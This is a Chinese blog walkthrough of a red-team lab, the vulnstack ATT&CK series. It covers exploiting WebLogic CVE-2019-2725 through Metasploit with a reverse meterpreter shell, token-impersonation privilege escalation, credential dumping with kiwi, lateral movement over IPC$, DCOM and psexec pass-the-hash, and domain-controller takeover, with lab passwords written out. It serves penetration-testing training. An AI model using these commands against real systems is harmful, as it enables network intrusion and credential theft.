IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> ATT&CK实战系列(二) -> 正文阅读

[系统运维]ATT&CK实战系列(二)

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情

拓扑结构大体如下:
?

环境搭建

Kali

ip:192.168.111.135

Web

Ip1:192.168.111.80

Ip2:10.10.10.80

os:windows 2008

应用:weblogic 10.3.6 mssql 2008

Pc

Ip1:192.168.111.201

Ip2:10.10.10.201

Os:windows7

DC

ip:10.10.10.10

os:windows 2012

应用:AD域

内网:10.10.10.0/24

外网:192.168.111.0/24

从web机开始渗透, 这里需要手动开启服务,在C:

\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行

账号/密码:Administrator/1qaz@WSX

外网渗透

  • 先开始nmap扫描一下192.168.111.0/24存活主机

然后对80 主机进行信息收集扫描

通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.

?

开放139端口 就纯真samba服务 于是判断可能会有/远程命令执行漏洞

?

开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令

?

开放3389 那就是远程桌面喽

?

7001端口 百度了一下得知是 weblogic服务

?

weblogicScan进行扫描漏洞

然后百度了一下 CVE-2019-2725漏洞

CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder(xml解码器)反序列化漏洞

然后通过msf查看一下漏洞利用脚本

然后进入开始利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块

set target windows????? 这个模块默认是unix 所以我们的目标是windows 所以 改一下即可

Set payload? windows/x64/meterpreter/reverse_tcp?

set LHOST 192.168.111.135

Set rhosts 192.168.111.80? 要攻击目标

run

?

本来想直接提权,但是发现不能提system权限

system权限

方法1.

然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限

方法2.

还可以通过令牌窃取的方式进行提权

load incognito ????????????#加载incognito(伪装)

Getuid???????????????????????? #查看当前token

list_tokens -u???????????? ?#列出可用token

?impersonate_token "NT AUTHORITY\\SYSTEM"???? #token窃取,格式为impersonate_token"主机名\\用户名"

rev2self ?????????????????????#返回之前的token

然后使用 kiwi 获取 hash 账号密码

然后获得了域里的用户和密码 下面使用用户密码进行远程登录

开始第二阶段的信息搜集

Net? config workstation? #查域信息

得到域信息 还有10.10.10.0/24网段

设置一条通往10.10.10.0/24网段的路由

然后设置代理

使用use post/windows/gather/arp_scanner模块

扫描网段存活主机

然后又通过web 进行信息收集了一下

得知 10.10.10.10 就是域控

域成员 处理web? 还有一个PC机

然后判断PC ip是10.10.10.201

下面渗透pc域用户

方法一

首先用kali生成一个payload

然后通过web机 上传到 10.10.10.201c盘

先上传到web里

?

再控制WEB主机与PC建立一个ipc$连接:

net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator

然后把刚才上传的文件copy到10.10.10.201 c盘

?

然后再meterpreter中载入powershell模块

在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马:

?

然后从新开启一个msf 监听生成的 payload 1520 端口

?

成功反弹

下面开始提权

方法二

代理nmap扫描10.10.10.201

使用 exploit/windows/smb/psexec模块进行哈希传递

由于一开始再web机得知了域\用户\密码

说以就可以用这个模块直接打了

Set smbdomain? DE1AY? #域

Set smbuser ?administrator # 域用户

Set smbpass? lbb1111..???? #域用户密码

直接system权限

通过扫描得知3389是开哒

然后尝试一下代理远程能不能直接登录

  • 向DC 域控发起进攻

同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递

拿下域控制器 并且是system权限

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-12-23 16:04:59  更:2021-12-23 16:06:51 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 5:42:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码